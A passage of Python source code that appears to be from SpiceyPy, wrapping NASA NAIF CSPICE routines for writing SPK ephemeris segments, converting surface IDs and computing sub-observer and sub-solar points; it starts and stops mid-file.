libspice.spkuef_c(handle)
@spiceErrorCheck
def spkw02(handle, body, center, inframe, first, last, segid, intlen, n, polydg,
cdata, btime):
"""
Write a type 2 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw02_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param intlen: Length of time covered by logical record.
:type intlen: float
:param n: Number of coefficient sets.
:type n: int
:param polydg: Chebyshev polynomial degree.
:type polydg: int
:param cdata: Array of Chebyshev coefficients.
:type cdata: Array of floats
:param btime: Begin time of first logical record.
:type btime: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
intlen = ctypes.c_double(intlen)
n = ctypes.c_int(n)
polydg = ctypes.c_int(polydg)
cdata = stypes.toDoubleVector(cdata)
btime = ctypes.c_double(btime)
libspice.spkw02_c(handle, body, center, inframe, first, last, segid, intlen,
n, polydg, cdata, btime)
@spiceErrorCheck
def spkw03(handle, body, center, inframe, first, last, segid, intlen, n, polydg,
cdata, btime):
"""
Write a type 3 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw03_c.html
:param handle: Handle of SPK file open for writing.
:type handle: int
:param body: NAIF code for ephemeris object.
:type body: int
:param center: NAIF code for the center of motion of the body.
:type center: int
:param inframe: Reference frame name.
:type inframe: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param intlen: Length of time covered by record.
:type intlen: float
:param n: Number of records in segment.
:type n: int
:param polydg: Chebyshev polynomial degree.
:type polydg: int
:param cdata: Array of Chebyshev coefficients.
:type cdata: Array of floats
:param btime: Begin time of first record.
:type btime: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
intlen = ctypes.c_double(intlen)
n = ctypes.c_int(n)
polydg = ctypes.c_int(polydg)
cdata = stypes.toDoubleVector(cdata)
btime = ctypes.c_double(btime)
libspice.spkw03_c(handle, body, center, inframe, first, last, segid, intlen,
n, polydg, cdata, btime)
@spiceErrorCheck
def spkw05(handle, body, center, inframe, first, last, segid, gm, n, states,
epochs):
# see libspice args for solution to array[][N] problem
"""
Write an SPK segment of type 5 given a time-ordered set of
discrete states and epochs, and the gravitational parameter
of a central body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw05_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param gm: Gravitational parameter of central body.
:type gm: float
:param n: Number of states and epochs.
:type n: int
:param states: States.
:type states: Nx6-Element Array of floats
:param epochs: Epochs.
:type epochs: Array of floats
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
gm = ctypes.c_double(gm)
n = ctypes.c_int(n)
states = stypes.toDoubleMatrix(states)
epochs = stypes.toDoubleVector(epochs)
libspice.spkw05_c(handle, body, center, inframe, first, last, segid, gm, n,
states, epochs)
@spiceErrorCheck
def spkw08(handle, body, center, inframe, first, last, segid, degree, n, states,
epoch1, step):
# see libspice args for solution to array[][N] problem
"""
Write a type 8 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw08_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: NAIF code for an ephemeris object.
:type body: int
:param center: NAIF code for center of motion of "body".
:type center: int
:param inframe: Reference frame name.
:type inframe: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param degree: Degree of interpolating polynomials.
:type degree: int
:param n: Number of states.
:type n: int
:param states: Array of states.
:type states: Nx6-Element Array of floats
:param epoch1: Epoch of first state in states array.
:type epoch1: float
:param step: Time step separating epochs of states.
:type step: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
degree = ctypes.c_int(degree)
n = ctypes.c_int(n)
states = stypes.toDoubleMatrix(states) # X by 6 array
epoch1 = ctypes.c_double(epoch1)
step = ctypes.c_double(step)
libspice.spkw08_c(handle, body, center, inframe, first, last, segid, degree,
n, states, epoch1, step)
@spiceErrorCheck
def spkw09(handle, body, center, inframe, first, last, segid, degree, n, states,
epochs):
"""
Write a type 9 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw09_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: NAIF code for an ephemeris object.
:type body: int
:param center: NAIF code for center of motion of "body".
:type center: int
:param inframe: Reference frame name.
:type inframe: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param degree: Degree of interpolating polynomials.
:type degree: int
:param n: Number of states.
:type n: int
:param states: Array of states.
:type states: Nx6-Element Array of floats
:param epochs: Array of epochs corresponding to states.
:type epochs: Array of floats
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
degree = ctypes.c_int(degree)
n = ctypes.c_int(n)
states = stypes.toDoubleMatrix(states) # X by 6 array
epochs = stypes.toDoubleVector(epochs)
libspice.spkw09_c(handle, body, center, inframe, first, last, segid, degree,
n, states, epochs)
@spiceErrorCheck
def spkw10(handle, body, center, inframe, first, last, segid, consts, n, elems,
epochs):
"""
Write an SPK type 10 segment to the DAF open and attached to
the input handle.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw10_c.html
:param handle: The handle of a DAF file open for writing.
:type handle: int
:param body: The NAIF ID code for the body of the segment.
:type body: int
:param center: The center of motion for body.
:type center: int
:param inframe: The reference frame for this segment.
:type inframe: str
:param first: The first epoch for which the segment is valid.
:type first: float
:param last: The last epoch for which the segment is valid.
:type last: float
:param segid: The string to use for segment identifier.
:type segid: str
:param consts: The array of geophysical constants for the segment.
:type consts: 8-Element Array of floats
:param n: The number of element/epoch pairs to be stored.
:type n: int
:param elems: The collection of "two-line" element sets.
:type elems: Array of floats
:param epochs: The epochs associated with the element sets.
:type epochs: Array of floats
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
consts = stypes.toDoubleVector(consts)
n = ctypes.c_int(n)
elems = stypes.toDoubleVector(elems)
epochs = stypes.toDoubleVector(epochs)
libspice.spkw10_c(handle, body, center, inframe, first, last, segid, consts,
n, elems, epochs)
@spiceErrorCheck
def spkw12(handle, body, center, inframe, first, last, segid, degree, n, states,
epoch0, step):
"""
Write a type 12 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw12_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: NAIF code for an ephemeris object.
:type body: int
:param center: NAIF code for center of motion of body.
:type center: int
:param inframe: Reference frame name.
:type inframe: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param degree: Degree of interpolating polynomials.
:type degree: int
:param n: Number of states.
:type n: int
:param states: Array of states.
:type states: Nx6-Element Array of floats
:param epoch0: Epoch of first state in states array.
:type epoch0: float
:param step: Time step separating epochs of states.
:type step: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
degree = ctypes.c_int(degree)
n = ctypes.c_int(n)
states = stypes.toDoubleMatrix(states) # X by 6 array
epoch0 = ctypes.c_double(epoch0)
step = ctypes.c_double(step)
libspice.spkw12_c(handle, body, center, inframe, first, last, segid, degree,
n, states, epoch0, step)
@spiceErrorCheck
def spkw13(handle, body, center, inframe, first, last, segid, degree, n, states,
epochs):
"""
Write a type 13 segment to an SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw13_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: NAIF code for an ephemeris object.
:type body: int
:param center: NAIF code for center of motion of body.
:type center: int
:param inframe: Reference frame name.
:type inframe: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param degree: Degree of interpolating polynomials.
:type degree: int
:param n: Number of states.
:type n: int
:param states: Array of states.
:type states: Nx6-Element Array of floats
:param epochs: Array of epochs corresponding to states.
:type epochs: Array of floats
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
degree = ctypes.c_int(degree)
n = ctypes.c_int(n)
states = stypes.toDoubleMatrix(states) # X by 6 array
epochs = stypes.toDoubleVector(epochs)
libspice.spkw13_c(handle, body, center, inframe, first, last, segid, degree,
n, states, epochs)
@spiceErrorCheck
def spkw15(handle, body, center, inframe, first, last, segid, epoch, tp, pa, p,
ecc, j2flg, pv, gm, j2, radius):
"""
Write an SPK segment of type 15 given a type 15 data record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw15_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param epoch: Epoch of the periapse.
:type epoch: float
:param tp: Trajectory pole vector.
:type tp: 3-Element Array of floats
:param pa: Periapsis vector.
:type pa: 3-Element Array of floats
:param p: Semi-latus rectum.
:type p: float
:param ecc: Eccentricity.
:type ecc: float
:param j2flg: J2 processing flag.
:type j2flg: float
:param pv: Central body pole vector.
:type pv: 3-Element Array of floats
:param gm: Central body GM.
:type gm: float
:param j2: Central body J2.
:type j2: float
:param radius: Equatorial radius of central body.
:type radius: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
epoch = ctypes.c_double(epoch)
tp = stypes.toDoubleVector(tp)
pa = stypes.toDoubleVector(pa)
p = ctypes.c_double(p)
ecc = ctypes.c_double(ecc)
j2flg = ctypes.c_double(j2flg)
pv = stypes.toDoubleVector(pv)
gm = ctypes.c_double(gm)
j2 = ctypes.c_double(j2)
radius = ctypes.c_double(radius)
libspice.spkw15_c(handle, body, center, inframe, first, last, segid, epoch,
tp, pa, p, ecc, j2flg, pv, gm, j2, radius)
@spiceErrorCheck
def spkw17(handle, body, center, inframe, first, last, segid, epoch, eqel,
rapol, decpol):
"""
Write an SPK segment of type 17 given a type 17 data record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw17_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param epoch: Epoch of elements in seconds past J2000.
:type epoch: float
:param eqel: Array of equinoctial elements.
:type eqel: 9-Element Array of floats
:param rapol: Right Ascension of the pole of the reference plane.
:type rapol: float
:param decpol: Declination of the pole of the reference plane.
:type decpol: float
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
epoch = ctypes.c_double(epoch)
eqel = stypes.toDoubleVector(eqel)
rapol = ctypes.c_double(rapol)
decpol = ctypes.c_double(decpol)
libspice.spkw17_c(handle, body, center, inframe, first, last, segid, epoch,
eqel, rapol, decpol)
@spiceErrorCheck
def spkw18(handle, subtyp, body, center, inframe, first, last, segid, degree, packts, epochs):
"""
Write a type 18 segment to an SPK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw18_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param subtyp: SPK type 18 subtype code.
:type subtyp: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param degree: Degree of interpolating polynomials.
:type degree: int
:param packts: data packets
:type packts: 2D Array of floats
:param epochs: Array of epochs corresponding to states.
:type epochs: N-Element Array of floats
"""
handle = ctypes.c_int(handle)
subtyp = ctypes.c_int(subtyp)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
degree = ctypes.c_int(degree)
n = ctypes.c_int(len(packts))
packts = stypes.toDoubleMatrix(packts)
epochs = stypes.toDoubleVector(epochs)
libspice.spkw18_c(handle, subtyp, body, center, inframe, first, last, segid, degree, n, packts, epochs)
@spiceErrorCheck
def spkw20(handle, body, center, inframe, first, last, segid, intlen, n, polydg, cdata, dscale, tscale, initjd, initfr):
"""
Write a type 20 segment to an SPK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw20_c.html
:param handle: Handle of an SPK file open for writing.
:type handle: int
:param body: Body code for ephemeris object.
:type body: int
:param center: Body code for the center of motion of the body.
:type center: int
:param inframe: The reference frame of the states.
:type inframe: str
:param first: First valid time for which states can be computed.
:type first: float
:param last: Last valid time for which states can be computed.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param intlen: Length of time covered by logical record (days).
:param n: Number of logical records in segment.
:param polydg: Chebyshev polynomial degree.
:param cdata: Array of Chebyshev coefficients and positions.
:param dscale: Distance scale of data.
:param tscale: Time scale of data.
:param initjd: Integer part of begin time (TDB Julian date) of first record.
:param initfr: Fractional part of begin time (TDB Julian date) of first record.
"""
handle = ctypes.c_int(handle)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
inframe = stypes.stringToCharP(inframe)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
intlen = ctypes.c_double(intlen)
n = ctypes.c_int(n)
polydg = ctypes.c_int(polydg)
cdata = stypes.toDoubleVector(cdata)
dscale = ctypes.c_double(dscale)
tscale = ctypes.c_double(tscale)
initjd = ctypes.c_double(initjd)
initfr = ctypes.c_double(initfr)
libspice.spkw20_c(handle, body, center, inframe, first, last, segid, intlen, n, polydg, cdata, dscale, tscale, initjd, initfr)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfc2s(code, bodyid, srflen=_default_len_out):
"""
Translate a surface ID code, together with a body ID code, to the
corresponding surface name. If no such name exists, return a
string representation of the surface ID code.
note: from NAIF if isname is false, this case is not treated as an error.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfc2s_c.html
:param code: Integer surface ID code to translate to a string.
:type code: int
:param bodyid: ID code of body associated with surface.
:type bodyid: int
:param srflen: Available space in output string.
:param srflen: int
:return: String corresponding to surface ID code.
:rtype: str
"""
code = ctypes.c_int(code)
bodyid = ctypes.c_int(bodyid)
srfstr = stypes.stringToCharP(srflen)
srflen = ctypes.c_int(srflen)
isname = ctypes.c_int()
libspice.srfc2s_c(code, bodyid, srflen, srfstr, ctypes.byref(isname))
return stypes.toPythonString(srfstr), bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfcss(code, bodstr, srflen=_default_len_out):
"""
Translate a surface ID code, together with a body string, to the
corresponding surface name. If no such surface name exists,
return a string representation of the surface ID code.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfcss_c.html
:param code: Integer surface ID code to translate to a string.
:type code: int
:param bodstr: Name or ID of body associated with surface.
:type bodstr: str
:param srflen: Available space in output string.
:param srflen: int
:return: String corresponding to surface ID code.
:rtype: str
"""
code = ctypes.c_int(code)
bodstr = stypes.stringToCharP(bodstr)
srfstr = stypes.stringToCharP(srflen)
srflen = ctypes.c_int(srflen)
isname = ctypes.c_int()
libspice.srfcss_c(code, bodstr, srflen, srfstr, ctypes.byref(isname))
return stypes.toPythonString(srfstr), bool(isname.value)
@spiceErrorCheck
def srfnrm(method, target, et, fixref, srfpts):
"""
Map array of surface points on a specified target body to
the corresponding unit length outward surface normal vectors.
The surface of the target body may be represented by a triaxial
ellipsoid or by topographic data provided by DSK files.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfnrm_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in TDB seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param srfpts: Array of surface points.
:type srfpts: 3xM-Element Array of floats
:return: Array of outward, unit length normal vectors.
:rtype: 3xM-Element Array of floats
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
npts = ctypes.c_int(len(srfpts))
srfpts = stypes.toDoubleMatrix(srfpts)
normls = stypes.emptyDoubleMatrix(3, npts.value)
libspice.srfnrm_c(method, target, et, fixref, npts, srfpts, normls)
return stypes.cMatrixToNumpy(normls)
@spiceErrorCheck
def srfrec(body, longitude, latitude):
"""
Convert planetocentric latitude and longitude of a surface
point on a specified body to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfrec_c.html
:param body: NAIF integer code of an extended body.
:type body: int
:param longitude: Longitude of point in radians.
:type longitude: float
:param latitude: Latitude of point in radians.
:type latitude: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
body = ctypes.c_int(body)
longitude = ctypes.c_double(longitude)
latitude = ctypes.c_double(latitude)
rectan = stypes.emptyDoubleVector(3)
libspice.srfrec_c(body, longitude, latitude, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfs2c(srfstr, bodstr):
"""
Translate a surface string, together with a body string, to the
corresponding surface ID code. The input strings may contain
names or integer ID codes.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfs2c_c.html
:param srfstr: Surface name or ID string.
:type srfstr: str
:param bodstr: Body name or ID string.
:type bodstr: str
:return: Integer surface ID code.
:rtype: int
"""
srfstr = stypes.stringToCharP(srfstr)
bodstr = stypes.stringToCharP(bodstr)
code = ctypes.c_int()
isname = ctypes.c_int()
libspice.srfs2c_c(srfstr, bodstr, ctypes.byref(code), ctypes.byref(isname))
return code.value, bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfscc(srfstr, bodyid):
"""
Translate a surface string, together with a body ID code, to the
corresponding surface ID code. The input surface string may
contain a name or an integer ID code.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfscc_c.html
:param srfstr: Surface name or ID string.
:type srfstr: str
:param bodyid: ID code of body associated with surface.
:type bodyid: int
:return: Integer surface ID code.
:rtype: int
"""
srfstr = stypes.stringToCharP(srfstr)
bodyid = ctypes.c_int(bodyid)
code = ctypes.c_int()
isname = ctypes.c_int()
libspice.srfscc_c(srfstr, bodyid, ctypes.byref(code), ctypes.byref(isname))
return code.value, bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfxpt(method, target, et, abcorr, obsrvr, dref, dvec):
"""
Deprecated: This routine has been superseded by the CSPICE
routine :func:`sincpt`. This routine is supported for purposes of
backward compatibility only.
Given an observer and a direction vector defining a ray, compute the
surface intercept point of the ray on a target body at a specified
epoch, optionally corrected for light time and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfxpt_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: Union[float,Iterable[float]]
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param dref: Reference frame of input direction vector.
:type dref: str
:param dvec: Ray's direction vector.
:type dvec: 3-Element Array of floats
:return:
Surface intercept point on the target body,
Distance from the observer to the intercept point,
Intercept epoch,
Observer position relative to target center.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
dref = stypes.stringToCharP(dref)
dvec = stypes.toDoubleVector(dvec)
spoint = stypes.emptyDoubleVector(3)
trgepc = ctypes.c_double()
dist = ctypes.c_double()
obspos = stypes.emptyDoubleVector(3)
found = ctypes.c_int()
if hasattr(et, "__iter__"):
spoints = []
dists = []
trgepcs = []
obsposs = []
founds = []
for t in et:
libspice.srfxpt_c(method, target, t, abcorr, obsrvr, dref, dvec,
spoint, ctypes.byref(dist), ctypes.byref(trgepc),
obspos, ctypes.byref(found))
checkForSpiceError(None)
spoints.append(stypes.cVectorToPython(spoint))
dists.append(dist.value)
trgepcs.append(trgepc.value)
obsposs.append(stypes.cVectorToPython(obspos))
founds.append(bool(found.value))
return spoints, dists, trgepcs, obsposs, founds
else:
et = ctypes.c_double(et)
libspice.srfxpt_c(method, target, et, abcorr, obsrvr, dref, dvec, spoint,
ctypes.byref(dist), ctypes.byref(trgepc), obspos, ctypes.byref(found))
return stypes.cVectorToPython(spoint), dist.value, trgepc.value, stypes.cVectorToPython(obspos), bool(found.value)
@spiceErrorCheck
def ssize(newsize, cell):
"""
Set the size (maximum cardinality) of a CSPICE cell of any data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ssize_c.html
:param newsize: Size (maximum cardinality) of the cell.
:type newsize: int
:param cell: The cell.
:type cell: spiceypy.utils.support_types.SpiceCell
:return: The updated cell.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
newsize = ctypes.c_int(newsize)
libspice.ssize_c(newsize, ctypes.byref(cell))
return cell
@spiceErrorCheck
def stelab(pobj, vobs):
"""
Correct the apparent position of an object for stellar
aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/stelab_c.html
:param pobj: Position of an object with respect to the observer.
:type pobj: 3-Element Array of floats
:param vobs:
Velocity of the observer with respect
to the Solar System barycenter.
:type vobs: 3-Element Array of floats
:return:
Apparent position of the object with respect to
the observer, corrected for stellar aberration.
:rtype: 3-Element Array of floats
"""
pobj = stypes.toDoubleVector(pobj)
vobs = stypes.toDoubleVector(vobs)
appobj = stypes.emptyDoubleVector(3)
libspice.stelab_c(pobj, vobs, appobj)
return stypes.cVectorToPython(appobj)
@spiceErrorCheck
@spiceFoundExceptionThrower
def stpool(item, nth, contin, lenout=_default_len_out):
"""
Retrieve the nth string from the kernel pool variable, where the
string may be continued across several components of the kernel pool
variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/stpool_c.html
:param item: Name of the kernel pool variable.
:type item: str
:param nth: Index of the full string to retrieve.
:type nth: int
:param contin: Character sequence used to indicate continuation.
:type contin: str
:param lenout: Available space in output string.
:type lenout: int
:return:
A full string concatenated across continuations,
The number of characters in the full string value.
:rtype: tuple
"""
item = stypes.stringToCharP(item)
contin = stypes.stringToCharP(contin)
nth = ctypes.c_int(nth)
strout = stypes.stringToCharP(lenout)
lenout = ctypes.c_int(lenout)
found = ctypes.c_int()
sizet = ctypes.c_int()
libspice.stpool_c(item, nth, contin, lenout, strout, ctypes.byref(sizet),
ctypes.byref(found))
return stypes.toPythonString(strout), sizet.value, bool(found.value)
@spiceErrorCheck
def str2et(time):
"""
Convert a string representing an epoch to a double precision
value representing the number of TDB seconds past the J2000
epoch corresponding to the input epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/str2et_c.html
:param time: A string representing an epoch.
:type time: str
:return: The equivalent value in seconds past J2000, TDB.
:rtype: float
"""
if isinstance(time, list):
return numpy.array([str2et(t) for t in time])
time = stypes.stringToCharP(time)
et = ctypes.c_double()
libspice.str2et_c(time, ctypes.byref(et))
return et.value
@spiceErrorCheck
def subpnt(method, target, et, fixref, abcorr, obsrvr):
"""
Compute the rectangular coordinates of the sub-observer point on
a target body at a specified epoch, optionally corrected for
light time and stellar aberration.
This routine supersedes :func:`subpt`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpnt_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:return:
Sub-observer point on the target body,
Sub-observer point epoch,
Vector from observer to sub-observer point.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.emptyDoubleVector(3)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
libspice.subpnt_c(method, target, et, fixref, abcorr, obsrvr, spoint,
ctypes.byref(trgepc), srfvec)
return stypes.cVectorToPython(spoint), trgepc.value, stypes.cVectorToPython(
srfvec)
@spiceErrorCheck
def subpt(method, target, et, abcorr, obsrvr):
"""
Deprecated: This routine has been superseded by the CSPICE
routine :func:`subpnt`. This routine is supported for purposes of
backward compatibility only.
Compute the rectangular coordinates of the sub-observer point on
a target body at a particular epoch, optionally corrected for
planetary (light time) and stellar aberration. Return these
coordinates expressed in the body-fixed frame associated with the
target body. Also, return the observer's altitude above the
target body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpt_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: Union[float,Iterable[float]]
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:return:
Sub-observer point on the target body,
Altitude of the observer above the target body.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.emptyDoubleVector(3)
alt = ctypes.c_double()
if hasattr(et, "__iter__"):
points = []
alts = []
for t in et:
libspice.subpt_c(method, target, ctypes.c_double(t), abcorr, obsrvr, spoint, ctypes.byref(alt))
checkForSpiceError(None)
points.append(stypes.cVectorToPython(spoint))
alts.append(alt.value)
return points, alts
else:
et = ctypes.c_double(et)
libspice.subpt_c(method, target, et, abcorr, obsrvr, spoint, ctypes.byref(alt))
return stypes.cVectorToPython(spoint), alt.value
@spiceErrorCheck
def subslr(method, target, et, fixref, abcorr, obsrvr):
"""
Compute the rectangular coordinates of the sub-solar point on
a target body at a specified epoch, optionally corrected for
light time and stellar aberration.
This routine supersedes subsol_c.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subslr_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:return:
Sub-solar point on the target body,
Sub-solar point epoch,
Vector from observer to sub-solar point.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.emptyDoubleVector(3)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
libspice.subslr_c(method, target, et, fixref, abcorr, obsrvr, spoint,
ctypes.byref(trgepc), srfvec)
return stypes.cVectorToPython(spoint), trgepc.value, stypes.cVectorToPython(
srfvec)
@spiceErrorCheck
def subsol(method, target, et, abcorr, obsrvr):
"""
Deprecated: This routine has been superseded by the CSPICE
routine :func:`subslr`. This routine is supported for purposes of
backward compatibility only.
